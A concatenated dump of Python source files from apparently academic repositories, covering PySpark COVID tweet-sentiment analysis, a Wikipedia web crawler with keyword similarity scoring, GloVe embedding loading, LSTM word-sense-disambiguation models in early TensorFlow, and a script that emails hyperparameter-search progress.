covid = sc.textFile(cov).map(lambda line: parseLine(line).split(",")).filter(lambda line: line[-1].isdigit()).map(lambda line: ["global", dailyIncrease(line[60::])]).reduceByKey(combineSeries).collect()
covid = sc.parallelize(covid[0][1])
maximum = covid.max()
covid = covid.map(lambda each: float(each)/float(maximum))
covid.saveAsTextFile("covid")
sent = sc.textFile(senti).map(lambda line: line.split(" ")).map(lambda line: [int(line[0][14:-4]), float(line[3])]).collect()#.saveAsTextFile("senti_processed")
sorted_senti = sorted(sent)
sorted_senti = sc.parallelize(sorted_senti).map(lambda x: x[1])
max_senti = sorted_senti.max()
sorted_senti = sorted_senti.map(lambda x: float(x)/float(max_senti))
sorted_senti.saveAsTextFile("sorted_senti")
#print(sorted_senti)
print(Statistics.corr(covid, sorted_senti))
```
#### File: RBDA_Covid_Tweets_Trend_Analysis/getAvgScore/getAverage.py
```python
import sys
from pathlib import Path
from pyspark import SparkConf, SparkContext
from pyspark.sql import SQLContext
from pyspark import sql
from os import listdir
def main(input_dir, result_path):
conf = SparkConf().setMaster("yarn-client").setAppName("avg").set('spark.executor.memory', '4G').set('spark.driver.memory', '4G').set('spark.driver.maxResultSize', '4G')
sc = SparkContext(conf=conf)
sqlContext = sql.SQLContext(sc)
with open(result_path, "a") as f:
for file in listdir(input_dir):
sum = None
count = None
with open(input_dir + "/" + file) as in_f:
lines = in_f.read().splitlines()
rdd = sc.parallelize(lines)
row_rdd = rdd.map(lambda line: line.split(",")).filter(lambda line: len(line) == 2)
sum = row_rdd.map(lambda line: (float(line[1]))).sum()
count = row_rdd.count()
in_f.close()
f.write(file + " " + str(sum) + " " + str(count) + " " + str(sum / count) +"\n")
f.close()
if __name__ == "__main__":
main(sys.argv[1], sys.argv[2])
``` |
{
"source": "jia1/cs2309",
"score": 3
} |
#### File: jia1/cs2309/crawl.py
```python
from collections import deque
import data
import parse
import requests
import similarity
import time
seeds = deque(["https://en.wikipedia.org/wiki/Main_Page"])
searches = data.searches
def initSeeds(root, url):
length = len(root)
def isSite(link):
return link != root and root in link
def sliceLink(link):
return link[length:]
seeds = filter(isSite, parse.parseLinks(url))
seeds = deque(map(sliceLink, seeds))
print(seeds)
def initTopics(selector, url):
topics = parse.parseClass(selector, url)
print(topics)
def bfsCrawlWrite(frontier, iterations):
frontier = deque(frontier)
relevant, threshold = [], 2/3
indent1 = 0, ' ' * 2
indent2, indent3 = indent1 * 2, indent1 * 3
indent4 = indent2 * 2
i = 0
with open('similarity.json', 'w') as f:
f.write('[\n%s[\n%s""' % (indent1, indent2))
while frontier and i < iterations:
f.write(',\n%s{\n' % (indent2))
url = frontier.popleft()
resp = requests.get(url)
topics = parse.parseKeywords(resp)
f.write('%s"": ""' % (indent3))
for topic in topics:
relevant = False
stringBuilder = []
stringBuilder.append(',\n%s"%s": [\n' % (indent3, topic))
for search in searches:
try:
score = similarity.getSim(search, topic)
if score >= threshold:
relevant = True
stringBuilder.append('%s"(%s, %s)",\n' % (indent4, \
search, score))
except:
continue
if relevant:
stringBuilder[-1] = stringBuilder[-1].rstrip()[:-1]
stringBuilder.append('\n')
f.write(''.join(stringBuilder))
f.write('%s]' % (indent3))
frontier.extend(deque(parse.parseLinks(resp)))
f.write('\n%s}\n%s]' % (indent2, indent1))
if frontier and i < iterations:
f.write(',')
else:
break
i += 1
f.write('\n]')
f.close()
def bfsCrawl(frontier, iterations):
frontier = deque(frontier)
lowLim, uppLim = 3/5, 4/5
i, numVisited, urlVisited = 0, 0, set()
while frontier and i < iterations:
url = frontier.popleft()
urlVisited.add(url)
host = parse.getDomain(url)
resp = requests.get(url)
topics = parse.parseKeywords(resp)
for topic in topics:
for search in searches:
try:
score = similarity.getSim(search, topic)
if lowLim < score < highLim:
print(str((score, search, topic, url)))
except:
continue
frontier.extend(deque(parse.parseLinks(resp) - urlVisited))
numVisited += 1
i += 1
return (len(frontier), numVisited)
def dfsCrawl(stack, iterations):
stack = deque(stack)
lowLim, uppLim = 3/5, 4/5
depthMax, lastHost = 3, ""
depthLeft = depthMax
i, numVisited, urlVisited = 0, 0, set()
while stack and i < iterations:
url = stack.pop()
urlVisited.add(url)
resp = requests.get(url)
topics = parse.parseKeywords(resp)
for topic in topics:
for search in searches:
try:
score = similarity.getSim(search, topic)
if lowLim < score < highLim:
print(str((score, search, topic, url)))
except:
continue
host = parse.getDomain(url)
if host == lastHost:
if depthLeft:
depthLeft -= 1
stack.extend(deque(parse.parseLinks(resp)))
else:
depthLeft = depthMax
else:
depthLeft = depthMax
stack.extend(deque(parse.parseLinks(resp) - urlVisited))
numVisited += 1
i += 1
return (len(stack), numVisited)
# TEST
def test():
iterations = 100
print("Iterations: %d" % iterations)
print()
start = time.time()
queueSize, bfsnumVisited = bfsCrawl(seeds, iterations)
print("Size of Queue: %d" % queueSize)
print("Number of numVisited: %d" % bfsnumVisited)
print("Time Taken: %f" % (time.time() - start))
print()
start = time.time()
stackSize, dfsnumVisited = dfsCrawl(seeds, iterations)
print("Size of Stack: %d" % queueSize)
print("Number of numVisited: %d" % dfsnumVisited)
print("Time Taken: %f" % (time.time() - start))
print()
# test()
```
#### File: jia1/cs2309/parse.py
```python
from bs4 import BeautifulSoup
from time import time
from urllib.parse import urlparse
import requests
import math
import rake, random, re
rakeInstance = rake.Rake('./Resources/RAKE/SmartStoplist.txt')
specialString = ['//', ' ', '\\']
# kgr
# 2012, March 8
# Get Domain Name from URL
# http://stackoverflow.com/questions/9626535/get-domain-name-from-url
def getDomain(url):
parsed = urlparse(url)
domain = '{uri.scheme}://{uri.netloc}'.format(uri = parsed)
return domain
def parseClass(className, url):
def alphaOrSpace(string):
return all(c.isalpha() or c.isspace() for c in string)
resp = getResponse(url)
html = resp.read()
soup = BeautifulSoup(html, 'lxml')
elem = soup.select('.' + className)
elem = map(lambda x: x.string, elem)
elem = filter(lambda x: alphaOrSpace(x), elem)
# return list(map(lambda x: x.replace(' ', '_'), elem))
return list(map(lambda x: x.split(' '), elem))
# Adapted from <NAME>. (2014)
def parseLinks(resp):
domain = getDomain(resp.url)
soup = BeautifulSoup(resp.text, "lxml", from_encoding = resp.encoding)
edges = set()
for link in soup.find_all('a', href = True):
u = link['href']
if u and u[0] not in ['#', '?']:
if u[0] == '/':
u = domain + u
edges.add(u)
return edges
def parseKeywords(resp): return replaceSpace(parseRake(parseText(resp)))
# Adapted from <NAME>. & <NAME>. (2016)
def parseText(resp):
html = resp.text
soup = BeautifulSoup(html, 'lxml')
resultSetText = soup.findAll(text = True)
tags = ['style', 'script', '[document]', 'head', 'title']
def isVisible(doc):
string = str(doc)
return len(doc) >= 3 and \
not (doc.parent.name in tags
or re.match('<!--.*-->', string))
def stripString(navigableString):
stripped = navigableString.strip()
encoded = stripped.encode('utf-8')
string = str(encoded)
finalString = ""
for s in re.findall("'([^']*)'", string):
if isShort(s):
finalString = randomHash
else:
finalString += s
return finalString
def isReadable(string):
return string != randomHash \
and not any(special in string for special in specialString)
def isShort(string): return len(string) < 3
visible = filter(isVisible, resultSetText)
randomHash = str(random.getrandbits(128))
strippedStrings = map(stripString, visible)
listText = filter(isReadable, strippedStrings)
return ', '.join(listText)
def parseRake(string): return rakeInstance.run(string)
def replaceSpace(rakeOutput):
return map(lambda w: w[0].split(' '), rakeOutput)
# TEST
def test():
strt = time()
example = "http://www.comp.nus.edu.sg/"
resp = requests.get(example)
text = parseText(resp)
keywords = parseKeywords(resp)
print("DOMAIN:\t%s\n" % getDomain(example))
print("LINKS:\t%s\n" % (parseLinks(resp)))
print("TEXT:\t%s\n" % text)
print("WORDS:\t%s\n" % list(keywords))
print("TIME:\t%f\t\n" % (time() - strt), end = '\n')
# test()
``` |
{
"source": "jia1/lstm_wsd",
"score": 3
} |
#### File: jia1/lstm_wsd/glove.py
```python
import numpy as np
glove_dir = './data/glove.6B/'
def load_glove(size):
path = glove_dir + 'glove.6B.' + str(size) + 'd.txt'
wordvecs = {}
with open(path, 'r') as file:
lines = file.readlines()
for line in lines:
tokens = line.split(' ')
vec = np.array(tokens[1:], dtype=np.float32)
wordvecs[tokens[0]] = vec
return wordvecs
def fill_with_gloves(word_to_id, emb_size, wordvecs=None):
if not wordvecs:
wordvecs = load_glove(emb_size)
n_words = len(word_to_id)
res = np.zeros([n_words, emb_size], dtype=np.float32)
n_not_found = 0
for word, id in word_to_id.iteritems():
if word in wordvecs:
res[id, :] = wordvecs[word]
else:
n_not_found += 1
res[id, :] = np.random.normal(0.0, 0.1, emb_size)
print 'n words not found in glove word vectors: ' + str(n_not_found)
return res
```
#### File: jia1/lstm_wsd/gossip.py
```python
import time
import re
import sys
import smtplib
from email.mime.text import MIMEText
import socket
host_name = socket.gethostname()
if len(sys.argv) < 3:
sys.exit('run_id password')
pwd = sys.argv[2]
run_id = sys.argv[1]
path = '/home/salomons/project/wsd/smac-output/scenario/live-rundata-' + str(run_id) + '.json'
bests = [1000.0]
def send_email(bests):
print 'New best found: %f. Sending email.' % bests[-1]
msg = MIMEText('computer name: %s\nrun_id: %s\nhistory: %s' % (host_name, run_id, str(bests)))
# me == the sender's email address
# you == the recipient's email address
msg['Subject'] = 'New best: %f' % bests[-1]
msg['From'] = from_ = '<EMAIL>'
msg['To'] = to_ = '<EMAIL>'
# Send the message via our own SMTP server, but don't include the
# envelope header.
s = smtplib.SMTP('smtp.office365.com', 587)
s.starttls()
s.login("<EMAIL>", pwd)
s.sendmail(from_, [to_], msg.as_string())
s.quit()
while True:
with open(path, 'r') as file:
doc = file.read()
qualities = re.findall('\"r-quality\" : [+-d]+', doc)
q = []
for quality in qualities:
q.append(float(quality.split(' ')[-1].replace(',', '')))
if q:
candidate = min(q)
if candidate < bests[-1]:
bests.append(candidate)
send_email(bests)
time.sleep(240)
```
#### File: jia1/lstm_wsd/model2.py
```python
from data import *
from glove import *
import tensorflow as tf
import tensorflow.models.rnn.rnn_cell as rnn_cell
from sklearn.cross_validation import train_test_split
import os
import glob
# rm old log files
for file in glob.glob('/home/salomons/tmp/tf.log/*'):
os.remove(file)
# config
train_path = '/data/senseval2/eng-lex-sample.training.xml'
test_path = '/data/senseval2/eng-lex-samp.evaluation.xml'
# load data
train_data = load_senteval2_data(train_path)
test_data = load_senteval2_data(test_path)
print 'Dataset size (train/test): %d / %d' % (len(train_data), len(test_data))
# build vocab utils
word_to_id = build_vocab(train_data)
target_word_to_id, target_sense_to_id, n_words, n_senses_from_target_id = build_sense_ids(train_data)
print 'Vocabulary size: %d' % len(word_to_id)
# make numeric
train_ndata = convert_to_numeric(train_data, word_to_id, target_word_to_id, target_sense_to_id, n_senses_from_target_id)
test_ndata = convert_to_numeric(test_data, word_to_id, target_word_to_id, target_sense_to_id, n_senses_from_target_id)
n_step_f = 40
n_step_b = 40
print 'n_step forward/backward: %d / %d' % (n_step_f, n_step_b)
class Model:
def __init__(self, is_first, is_training, target_id, batch_size, n_step_f, n_step_b, init_word_vecs=None):
n_senses = n_senses_from_target_id[target_id]
self.inputs_f = tf.placeholder(tf.int32, shape=[batch_size, n_step_f])
self.inputs_b = tf.placeholder(tf.int32, shape=[batch_size, n_step_b])
# self.target_ids = tf.placeholder(tf.int32, shape=[batch_size])
self.sense_ids = tf.placeholder(tf.int32, shape=[batch_size, n_senses])
n_units = 100
state_size = 2 * n_units
reuse = None if is_first else True
vocab_size = len(word_to_id)
embedding_size = 100
def embedding_initializer(vec, dtype):
return init_word_vecs if init_word_vecs else tf.random_uniform([vocab_size, embedding_size], -.1, .1, dtype)
with tf.variable_scope('emb', reuse):
embeddings = tf.get_variable('embeddings', [vocab_size, embedding_size], initializer=embedding_initializer)
target_scope_reuse = None if is_training else True
with tf.variable_scope(str(target_id), target_scope_reuse):
W_target = tf.get_variable('W_target', [state_size*2, n_senses], tf.float32)
b_target = tf.get_variable('b_target', [1, n_senses])
keep_prop = 0.5
with tf.variable_scope("forward", reuse):
f_lstm = rnn_cell.DropoutWrapper(rnn_cell.BasicLSTMCell(n_units), output_keep_prob=keep_prop)
f_state = tf.Variable(tf.zeros([batch_size, state_size]), trainable=False)
# tf.get_variable('f_state',
# [batch_size, state_size],
# initializer=tf.constant_initializer(0.0),
# trainable=False)
# run inputs through lstm
inputs_f = tf.split(1, n_step_f, self.inputs_f)
for time_step, inputs_ in enumerate(inputs_f):
if time_step > 0:
tf.get_variable_scope().reuse_variables()
emb = tf.nn.embedding_lookup(embeddings, tf.squeeze(inputs_))
_, f_state = f_lstm(emb, f_state)
with tf.variable_scope("backward", reuse):
b_lstm = rnn_cell.DropoutWrapper(rnn_cell.BasicLSTMCell(n_units), output_keep_prob=keep_prop)
# b_state = b_lstm.zero_state(None, tf.float32)
b_state = tf.Variable(tf.zeros([batch_size, state_size]), trainable=False)
# b_state = tf.get_variable('b_state',
# [batch_size, state_size],
# initializer=tf.constant_initializer(0.0),
# trainable=False)
inputs_b = tf.split(1, n_step_b, self.inputs_b)
for time_step, inputs_ in enumerate(inputs_b):
if time_step > 0:
tf.get_variable_scope().reuse_variables()
emb = tf.nn.embedding_lookup(embeddings, tf.squeeze(inputs_))
_, b_state = b_lstm(emb, b_state)
concat_state = tf.concat(1, [f_state, b_state])
state = tf.nn.dropout(concat_state, keep_prop) if is_training else concat_state
logits = tf.matmul(state, W_target) + b_target
self.cost_op = tf.nn.softmax_cross_entropy_with_logits(logits, tf.cast(self.sense_ids, tf.float32))
self.accuracy_op = tf.reduce_mean(tf.cast(tf.equal(tf.arg_max(logits, 1), tf.arg_max(self.sense_ids, 1)), tf.float32))
if not is_training:
return
grads = tf.gradients(self.cost_op, W_target)
for grad in grads:
print tf.shape(grad)
tf.histogram_summary('grad_W_target', grads[0])
tf.scalar_summary('frac_0_grad_W', tf.nn.zero_fraction(grads[0]))
print 'TRAINABLE VARIABLES'
tvars = tf.trainable_variables()
for tvar in tvars:
print tvar.name
# max_grad_norm = 10
# grads, _ = tf.clip_by_global_norm(tf.gradients(self.cost_op, tvars), max_grad_norm)
# optimizer = tf.train.AdagradOptimizer(.5)
# self.train_op = optimizer.apply_gradients(zip(grads, tvars))
self.train_op = tf.train.AdagradOptimizer(0.2).minimize(self.cost_op)
self.summary_op = tf.merge_all_summaries()
def run_epoch(session, models, data_, mode):
cost = 0.
accuracy = 0.
summaries = []
n_batches = 0
for target_id, data in data_.iteritems():
xf, xb, sense_ids = data
print sense_ids.shape
model = models[target_id]
print tf.shape(model.sense_ids)
if mode == 'train':
ops = [model.cost_op, model.accuracy_op, model.summary_op, model.train_op]
elif mode == 'val':
ops = [model.cost_op, model.accuracy_op]
else:
raise ValueError('unknown mode')
fetches = session.run(ops, {
model.inputs_f: xf,
model.inputs_b: xb,
model.sense_ids: sense_ids
})
cost += fetches[0]
accuracy += fetches[1]
if mode == 'train':
summaries.append(fetches[2])
n_batches += 1
print '%s ::: cost: %f, accuracy: %f' % (mode.upper(), cost, accuracy)
if mode == 'train':
return summaries
if __name__ == '__main__':
n_epochs = 500
grouped_by_target = group_by_target(train_ndata)
train_data, val_data = split_grouped(grouped_by_target, .2, 2)
train_data = batchify_grouped(train_data, n_step_f, n_step_b, word_to_id['<pad>'], n_senses_from_target_id)
val_data = batchify_grouped(val_data, n_step_f, n_step_b, word_to_id['<pad>'], n_senses_from_target_id)
init_emb = fill_with_gloves(word_to_id, 100)
train_models = {}
val_models = {}
is_first = True
for target_id in grouped_by_target.keys()[:3]:
batch_size_train = len(train_data[target_id][2])
train_models[target_id] = Model(is_first, True, target_id, batch_size_train, n_step_f, n_step_b, init_emb)
is_first = False
batch_size_val = len(val_data[target_id][2])
val_models[target_id] = Model(is_first, False, target_id, batch_size_val, n_step_f, n_step_b, None)
session = tf.Session()
session.run(tf.initialize_all_variables())
summary_op = tf.merge_all_summaries()
writer = tf.train.SummaryWriter('/home/salomons/tmp/tf.log', session.graph_def, flush_secs=10)
for i in range(n_epochs):
print 'EPOCH: %d' % i
summaries = run_epoch(session, train_models, train_data, mode='train')
run_epoch(session, val_models, val_data, mode='val')
for batch_idx, summary in enumerate(summaries):
writer.add_summary(summary)
```
#### File: jia1/lstm_wsd/model.py
```python
from data import *
from glove import *
import tensorflow as tf
from tensorflow.python.ops import rnn_cell
from sklearn.cross_validation import train_test_split
class Model:
def __init__(self, is_training, conf, n_senses_from_target_id, word_to_id, init_word_vecs=None, skip_train_emb=0):
batch_size = conf['batch_size']
n_step_f = conf['n_step_f']
n_step_b = conf['n_step_b']
n_units = conf['n_lstm_units']
n_layers = conf['n_layers']
forget_bias = conf['forget_bias']
train_init_state = conf['train_init_state']
emb_base_std = conf['emb_base_std']
input_keep_prob = conf['input_keep_prob']
embedding_size = conf['embedding_size']
state_size = conf['state_size']
keep_prob = conf['keep_prob']
w_penalty = conf.get('w_penalty')
lr_start = 2.
lr_decay_factor = 0.99
lr_min = 0.1
print 'n_step forward/backward: %d / %d' % (n_step_f, n_step_b)
self.dbg = {}
self.batch_size = batch_size
self.is_training = is_training
self.inputs_f = tf.placeholder(tf.int32, shape=[batch_size, n_step_f])
self.inputs_b = tf.placeholder(tf.int32, shape=[batch_size, n_step_b])
self.train_target_ids = train_target_ids = tf.placeholder(tf.int32, shape=[batch_size])
self.train_sense_ids = train_sense_ids = tf.placeholder(tf.int32, shape=[batch_size])
global_step = tf.Variable(1.0, trainable=False)
tot_n_senses = sum(n_senses_from_target_id.values())
# self.train_labels = labels = tf.placeholder(tf.float32, shape=[batch_size, tot_n_senses])
vocab_size = len(word_to_id)
def embedding_initializer(vec, dtype):
return init_word_vecs if init_word_vecs is not None else tf.random_uniform([vocab_size, embedding_size],
-.1, .1, dtype)
with tf.variable_scope('emb'):
self.dbg['embeddings'] = embeddings = tf.get_variable('embeddings', [vocab_size, embedding_size],
initializer=embedding_initializer,
trainable=conf['train_embeddings'])
mean_embeddings = tf.reduce_mean(embeddings, 0, keep_dims=True)
self.dbg['std_emb'] = std_embeddings = tf.sqrt(tf.reduce_mean(tf.square(embeddings - mean_embeddings), 0))
print 'Avg n senses per target word: ' + str(tot_n_senses / len(n_senses_from_target_id))
n_senses_sorted_by_target_id = [n_senses_from_target_id[target_id] for target_id
in range(len(n_senses_from_target_id))]
n_senses_sorted_by_target_id_tf = tf.constant(n_senses_sorted_by_target_id, tf.int32)
_W_starts = (np.cumsum(np.append([0], n_senses_sorted_by_target_id)) * state_size)[:-1]
_W_lenghts = np.array(n_senses_sorted_by_target_id) * state_size
W_starts = tf.constant(_W_starts, tf.int32)
W_lengths = tf.constant(_W_lenghts, tf.int32)
_b_starts = (np.cumsum(np.append([0], n_senses_sorted_by_target_id)))[:-1]
_b_lengths = np.array(n_senses_sorted_by_target_id)
b_starts = tf.constant(_b_starts, tf.int32)
b_lengths = tf.constant(_b_lengths, tf.int32)
with tf.variable_scope('target_params', initializer=tf.random_uniform_initializer(-.1, .1)):
W_target = tf.get_variable('W_target', [tot_n_senses * state_size], dtype=tf.float32)
b_target = tf.get_variable('b_target', [tot_n_senses], dtype=tf.float32,
initializer=tf.constant_initializer(0.0))
with tf.variable_scope("forward"):
f_lstm = rnn_cell.BasicLSTMCell(n_units,
forget_bias=forget_bias) # LSTMCell(n_units, embedding_size, use_peepholes=True, initializer=tf.random_uniform_initializer(-.1, .1))
if is_training:
f_lstm = rnn_cell.DropoutWrapper(f_lstm, input_keep_prob=input_keep_prob)
f_lstm = rnn_cell.MultiRNNCell([f_lstm] * n_layers)
f_state = tf.get_variable('f_init_state', [batch_size, 2 * n_units * n_layers]) \
if train_init_state else f_lstm.zero_state(batch_size, tf.float32)
inputs_f = tf.split(1, n_step_f, self.inputs_f)
for time_step, inputs_ in enumerate(inputs_f):
if time_step > 0:
tf.get_variable_scope().reuse_variables()
emb = tf.nn.embedding_lookup(embeddings, tf.squeeze(inputs_))
if is_training:
emb = emb + std_embeddings * tf.random_normal([batch_size, embedding_size], stddev=emb_base_std)
_, f_state = f_lstm(emb, f_state)
with tf.variable_scope("backward"):
b_lstm = rnn_cell.BasicLSTMCell(n_units,
forget_bias=forget_bias) # LSTMCell(n_units, embedding_size, use_peepholes=True, initializer=tf.random_uniform_initializer(-.1, .1))
if is_training:
b_lstm = rnn_cell.DropoutWrapper(b_lstm, input_keep_prob=input_keep_prob)
b_lstm = rnn_cell.MultiRNNCell([b_lstm] * n_layers)
b_state = tf.get_variable('b_init_state', [batch_size, 2 * n_units * n_layers]) \
if train_init_state else b_lstm.zero_state(batch_size, tf.float32)
inputs_b = tf.split(1, n_step_b, self.inputs_b)
for time_step, inputs_ in enumerate(inputs_b):
if time_step > 0:
tf.get_variable_scope().reuse_variables()
emb = tf.nn.embedding_lookup(embeddings, tf.squeeze(inputs_))
if is_training:
emb = emb + std_embeddings * tf.random_normal([batch_size, embedding_size],
stddev=emb_base_std) # tf.nn.dropout(emb, emb_keep_prop)
_, b_state = b_lstm(emb, b_state)
f_state = tf.slice(tf.split(1, n_layers, f_state)[-1], [0, n_units], [batch_size, n_units])
b_state = tf.slice(tf.split(1, n_layers, b_state)[-1], [0, n_units], [batch_size, n_units])
state = tf.concat(1, [f_state, b_state])
if is_training:
state = tf.nn.dropout(state, keep_prob)
# hidden layer
with tf.variable_scope('hidden', initializer=tf.random_uniform_initializer(-0.1, 0.1)):
hidden = rnn_cell.linear(state, state_size, True)
if is_training:
hidden = tf.nn.dropout(hidden, keep_prob)
# y_hidden = tf.nn.tanh(hidden)
loss = tf.Variable(0., trainable=False)
n_correct = tf.Variable(0, trainable=False)
unbatched_states = tf.split(0, batch_size, hidden)
unbatched_target_ids = tf.split(0, batch_size, train_target_ids)
unbatched_sense_ids = tf.split(0, batch_size, train_sense_ids)
one = tf.constant(1, tf.int32, [1])
self.predictions = tf.Variable(tf.zeros([batch_size], dtype=tf.int64), trainable=False)
self.probas={}
# make predictions for all instances in batch
for i in range(batch_size):
target_id = unbatched_target_ids[i] # tf.split(train_target_ids, i, [1])
sense_id = unbatched_sense_ids[i]
self.dbg['W'] = W = tf.reshape(
tf.slice(W_target, tf.slice(W_starts, target_id, one), tf.slice(W_lengths, target_id, one)),
[-1, state_size])
self.dbg['b'] = b = tf.slice(b_target, tf.slice(b_starts, target_id, one),
tf.slice(b_lengths, target_id, one))
# self.dbg['ub_states'] = unbatched_states[i]
# self.dbg['ub_states.shape'] = tf.shape(unbatched_states[i])
# self.dbg['pre_b'] = tf.squeeze(tf.matmul(W, unbatched_states[i], False, True))
self.dbg['logits'] = logits = tf.squeeze(tf.matmul(W, unbatched_states[i], False, True)) + b
predicted_sense = tf.arg_max(logits, 0, name='prediction')
self.predictions = tf.scatter_update(self.predictions, tf.constant(i, dtype=tf.int64), predicted_sense)
self.dbg['exp_logits'] = exp_logits = tf.exp(logits)
summ = tf.reduce_sum(exp_logits)
self.dbg['p_targets'] = p_targets = exp_logits / summ
n_senses = tf.slice(n_senses_sorted_by_target_id_tf, target_id, [1])
answer = tf.sparse_to_dense(sense_id, n_senses, 1.0, 0.0)
p_target = tf.slice(p_targets, sense_id, one)
# p_target_safe = max(0.0001, p_target)
self.dbg['p_targets_safe'] = p_targets_safe = max(0.0001, p_targets)
self.probas[i]=p_targets_safe
self.dbg['mul'] = mul = tf.mul(answer, tf.log(p_targets_safe))
loss += - tf.reduce_sum(mul)
# loss += - tf.log(p_target_safe)
# accuracy
n_correct += tf.cast(tf.equal(sense_id, tf.cast(tf.arg_max(logits, 0), tf.int32)), tf.int32)
# if i == batch_size-1:
# tf.scalar_summary(['p_target'], p_target)
# tf.scalar_summary(['n_correct'], tf.cast(n_correct, tf.float32))
# tf.histogram_summary('logits', logits)
# tf.histogram_summary('W_target', W_target)
# tf.histogram_summary('b_target', b_target)
self.dbg['predictions'] = self.predictions
self.cost_op = tf.div(loss, batch_size)
self.accuracy_op = tf.div(tf.cast(n_correct, tf.float32), batch_size)
self.error_op = self.cost_op
if not is_training:
return
# grads = tf.gradients(self.cost_op, W_target)
# tf.histogram_summary('grad_W_target', grads[0])
# tf.scalar_summary('frac_0_grad_W', tf.nn.zero_fraction(grads[0]))
print 'TRAINABLE VARIABLES'
tvars = tf.trainable_variables()
for tvar in tvars:
print tvar.name
# Weight Penalty
if w_penalty:
print 'USING WEIGHT DECAY'
tensors_to_decay = ['model/target_params/W_target:0',
'model/forward/MultiRNNCell/Cell0/BasicLSTMCell/Linear/Matrix:0',
'model/backward/MultiRNNCell/Cell0/BasicLSTMCell/Linear/Matrix:0',
'model/hidden/Linear/Matrix:0']
w_cost = tf.constant(0.0)
n_w = tf.constant(0.0)
for tvar in tvars:
if tvar.name in tensors_to_decay:
w_cost += tf.nn.l2_loss(tvar)
n_w += tf.to_float(tf.size(tvar))
self.cost_op += w_penalty * w_cost / n_w
# Gradients
max_grad_norm = 10
grads, _ = tf.clip_by_global_norm(tf.gradients(self.cost_op, tvars), max_grad_norm)
self.lr = tf.maximum(lr_min, tf.train.exponential_decay(lr_start, global_step, 200, lr_decay_factor))
optimizer = tf.train.MomentumOptimizer(self.lr, 0.5)
# scaling down the learning for the embedings in the beginning
# w = tf.constant(should_update, shape=[vocab_size, embedding_size])
# w_embedding = tf.select(w, tf.zeros([vocab_size, embedding_size]), tf.ones([vocab_size, embedding_size]))
# if conf['train_embeddings']:
# self.dbg['should_update'] = should_update = tf.to_float(tf.less(tf.to_int32(global_step), skip_train_emb))
# for i, tvar in enumerate(tvars):
# if tvar.name == 'model/emb/embeddings:0':
# grads[i] = tf.mul(grads[i], should_update)
# self.dbg['grad_embeddings'] = tf.convert_to_tensor(grads[i])
# Update Parameters
self.train_op = optimizer.apply_gradients(zip(grads, tvars), global_step=global_step)
self.train_op_no_emb = optimizer.apply_gradients(zip(grads[1:], tvars[1:]), global_step=global_step)
# Summaries
self.summary_op = tf.merge_all_summaries()
def debug(model, session, feed_dict):
for name, op in model.dbg.iteritems():
value = session.run(op, feed_dict)
print '::: %s :::: \n%s' % (name, np.array_str(value))
def debug_op(op, session, feed_dict):
value = session.run(op, feed_dict)
print value
def run_epoch(session, model, conf, data_, mode, word_to_id, freeze_emb=False):
if mode == 'train':
ops = [model.cost_op, model.accuracy_op, model.lr]
if freeze_emb:
print 'Embeddings frozen'
ops += [model.train_op_no_emb]
else:
ops += [model.train_op]
elif mode == 'val':
ops = [model.cost_op, model.accuracy_op]
else:
raise ValueError('unknown mode')
cost = 0.
accuracy = 0.
lr = 0.0
summaries = []
n_batches = 0
for batch in batch_generator(mode == 'train', conf['batch_size'], data_, word_to_id['<pad>'], conf['n_step_f'],
conf['n_step_b'], permute_order=conf.get('permute_input_order'),
word_drop_rate=conf.get('word_drop_rate'), drop_id=word_to_id['<dropped>']):
xf, xb, target_ids, sense_ids, instance_ids = batch
feeds = {
model.inputs_f: xf,
model.inputs_b: xb,
model.train_target_ids: target_ids,
model.train_sense_ids: sense_ids
}
# debug(model, session, feeds)
# debug_op(model.dbg['grad_embeddings'], session, feeds)
fetches = session.run(ops, feeds)
cost += fetches[0]
accuracy += fetches[1]
if mode == 'train':
lr += fetches[2]
n_batches += 1
cost_epoch = cost / n_batches
accuracy_epoch = accuracy / n_batches
lr /= n_batches
print '%s --> \tcost: %f, \taccuracy: %f, n_batches: %f \tlr: %f' % (mode.upper(), cost_epoch, accuracy_epoch, n_batches, lr)
# if mode == 'train':
# return summaries
return cost_epoch, accuracy_epoch
```
#### File: jia1/lstm_wsd/scratch.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import sys
import time
import tensorflow.python.platform
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from tensorflow.python.platform import gfile
def _read_words(filename):
with gfile.GFile(filename, "r") as f:
return f.read().replace("\n", "<eos>").split()
def _build_vocab(filename):
data = _read_words(filename)
counter = collections.Counter(data)
count_pairs = sorted(counter.items(), key=lambda x: -x[1])
words, _ = list(zip(*count_pairs))
word_to_id = dict(zip(words, range(len(words))))
return word_to_id
def _file_to_word_ids(filename, word_to_id):
data = _read_words(filename)
return [word_to_id[word] for word in data]
def ptb_raw_data(data_path=None):
"""Load PTB raw data from data directory "data_path".
Reads PTB text files, converts strings to integer ids,
and performs mini-batching of the inputs.
The PTB dataset comes from <NAME>'s webpage:
http://www.fit.vutbr.cz/~imikolov/rnnlm/simple-examples.tgz
Args:
data_path: string path to the directory where simple-examples.tgz has
been extracted.
Returns:
tuple (train_data, valid_data, test_data, vocabulary)
where each of the data objects can be passed to PTBIterator.
"""
train_path = os.path.join(data_path, "ptb.train.txt")
valid_path = os.path.join(data_path, "ptb.valid.txt")
test_path = os.path.join(data_path, "ptb.test.txt")
word_to_id = _build_vocab(train_path)
train_data = _file_to_word_ids(train_path, word_to_id)
valid_data = _file_to_word_ids(valid_path, word_to_id)
test_data = _file_to_word_ids(test_path, word_to_id)
vocabulary = len(word_to_id)
return train_data, valid_data, test_data, vocabulary
def ptb_iterator(raw_data, batch_size, num_steps):
"""Iterate on the raw PTB data.
This generates batch_size pointers into the raw PTB data, and allows
minibatch iteration along these pointers.
Args:
raw_data: one of the raw data outputs from ptb_raw_data.
batch_size: int, the batch size.
num_steps: int, the number of unrolls.
Yields:
Pairs of the batched data, each a matrix of shape [batch_size, num_steps].
The second element of the tuple is the same data time-shifted to the
right by one.
Raises:
ValueError: if batch_size or num_steps are too high.
"""
raw_data = np.array(raw_data, dtype=np.int32)
data_len = len(raw_data)
batch_len = data_len // batch_size
data = np.zeros([batch_size, batch_len], dtype=np.int32)
for i in range(batch_size):
data[i] = raw_data[batch_len * i:batch_len * (i + 1)]
epoch_size = (batch_len - 1) // num_steps
if epoch_size == 0:
raise ValueError("epoch_size == 0, decrease batch_size or num_steps")
for i in range(epoch_size):
x = data[:, i*num_steps:(i+1)*num_steps]
y = data[:, i*num_steps+1:(i+1)*num_steps+1]
yield (x, y)
flags = tf.flags
logging = tf.logging
